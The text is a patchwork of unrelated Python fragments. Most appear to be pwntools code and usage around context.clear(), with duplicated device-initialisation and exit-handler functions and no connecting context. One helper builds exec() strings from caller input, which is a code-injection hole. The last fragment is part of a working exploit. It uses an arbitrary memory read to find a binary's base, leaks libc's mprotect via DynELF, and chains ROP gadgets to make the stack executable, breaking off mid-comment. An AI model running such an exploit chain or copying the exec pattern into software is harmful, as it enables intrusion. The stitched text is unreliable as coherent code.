def __do_deferred_initialization(self):
if self._initialized:
return
with context.local(device=self.serial):
abi = getprop('ro.product.cpu.abi')
context.clear()
context.arch = str(abi)
self._arch = context.arch
self._bits = context.bits
self._endian = context.endian
if self.port == 'emulator':
emulator, port = self.serial.split('-')
port = int(port)
try:
with remote('localhost', port, level='error') as r:
r.recvuntil('OK')
r.recvline() # Rest of the line
r.sendline('avd name')
self.avd = r.recvline().strip()
except:
pass
self._initialized = True
def __do_deferred_initialization(self):
if self._initialized:
return
with context.local(device=self.serial):
abi = str(properties.ro.product.cpu.abi)
context.clear()
context.arch = str(abi)
self._arch = context.arch
self._bits = context.bits
self._endian = context.endian
if self.port == 'emulator':
emulator, port = self.serial.split('-')
port = int(port)
try:
with remote('localhost', port, level='error') as r:
r.recvuntil('OK')
r.recvline() # Rest of the line
r.sendline('avd name')
self.avd = r.recvline().strip()
except:
pass
self._initialized = True
def set_context(self, **kwargs):
context.clear()
try:
self.__encoding = kwargs['encoding']
print(f"[+] Encoding => {self.__encoding}")
del kwargs['encoding']
except KeyError:
print("[*] No valid encoding provided: defaulting to ASCII")
self.__encoding = 'ascii'
try:
for key, value in kwargs.items():
exec(f"context.{key} = '{value}'")
except (KeyError, SyntaxError) as context_err:
print(f"[-] Unable to set value: {context_err}\n")
raise ValueError("Please provide a valid key/value pair.\n")
print(f"[+] Context => {vars(context)}\n")
def _run_handlers():
"""_run_handlers()
Run registered handlers. They run in the reverse order of which they were
registered.
If a handler raises an exception, it will be printed but nothing else
happens, i.e. other handlers will be run.
"""
for _ident, (func, args, kwargs, ctx) in \
sorted(_handlers.items(), reverse = True):
try:
with context.local():
context.clear()
context.update(**ctx)
func(*args, **kwargs)
except SystemExit:
pass
except Exception:
# extract the current exception and rewind the traceback to where it
# originated
typ, val, tb = sys.exc_info()
traceback.print_exception(typ, val, tb.tb_next)
def _run_handlers():
"""_run_handlers()
Run registered exit-handlers. They run in the reverse order of which they
were registered.
If a handler raises an exception, it will be printed but nothing else
happens, i.e. other handlers will be run and `sys.excepthook` will not be
called for that reason.
"""
context.clear()
for _ident, (func, args, kwargs, ctx) in \
sorted(_handlers.items(), reverse = True):
try:
with context.local(**ctx):
func(*args, **kwargs)
except SystemExit:
pass
except Exception:
# extract the current exception and rewind the traceback to where it
# originated
typ, val, tb = sys.exc_info()
traceback.print_exception(typ, val, tb.tb_next)
page_prefix = a_read(s, epp_ba, 4)
if page_prefix == bytes('\x7fELF', 'utf8'):
logging.info(
"epp base address: 0x{:X}".format(epp_ba))
break
epp_ba -= 0x1000
def leak(address):
return a_read(s, address, 8)
epp_dyn_elf = DynELF(leak, epp_ba)
libc_mprotect = epp_dyn_elf.lookup('mprotect', 'libc')
context.clear(arch='amd64')
binary = ELF(epp_path)
binary.address = epp_ba
binary.symbols = {'mprotect': libc_mprotect}
rop = ROP(binary)
# Mark the current stack page, and the one just before, incase we are on a boundary.
rop.call(
'mprotect', (stack_frame.previous_frame_stack_base_pointer & ~0xFFF, 0x2000, 0x7))
target_ip = socket.gethostbyname(socket.gethostname())
mprotect_rop = rop.chain()
logging.info(rop.dump())
# We are gonna be a little lazy and just end with an infinite loop,
# we make no attempt to clean up the stack and continue normal
